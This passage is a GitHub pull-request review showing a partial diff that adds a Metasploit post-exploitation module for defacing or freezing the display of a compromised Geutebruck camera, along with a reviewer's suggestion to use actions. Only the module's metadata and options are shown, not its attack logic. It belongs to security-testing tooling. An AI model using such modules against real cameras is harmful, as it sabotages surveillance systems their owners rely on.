modules/post/linux/manage/geutebruck_post_exp.rb

```diff
@@ -0,0 +1,61 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+
+
+  def initialize
+    super(
+      'Name'         => 'Geutebruck Camera Deface',
+      'Description'  => %q{
+        This module will be applied on a session connected to a Geutebruck Camera shell. It will freeze the camera dispaly/deface
+        the display of the camera on the web panel with an image.
+      },
+      'Author'       => 'Ibrahim Ayadhi-RandoriSec',
+      'License'      => MSF_LICENSE,
+      'Platform'      => ['linux'],
+      'SessionTypes'  => ['shell']
+    )
+
+    register_options(
+      [
+        OptString.new('IMAGE',   [false, 'Local image path to upload']),
+        OptBool.new('FREEZE', [false, 'Freeze the display of the camera'])
+      ])
+  end
+
+  def run
+        if datastore['FREEZE'] == true
```

Comment:
As an alternative, using actions might be nice here: https://github.com/rapid7/metasploit-framework/pull/15021/files#diff-9cdd1cac4edd777c7fefb25acf8a304956a7938c4056fbe53ce32d9b229b5eb8R33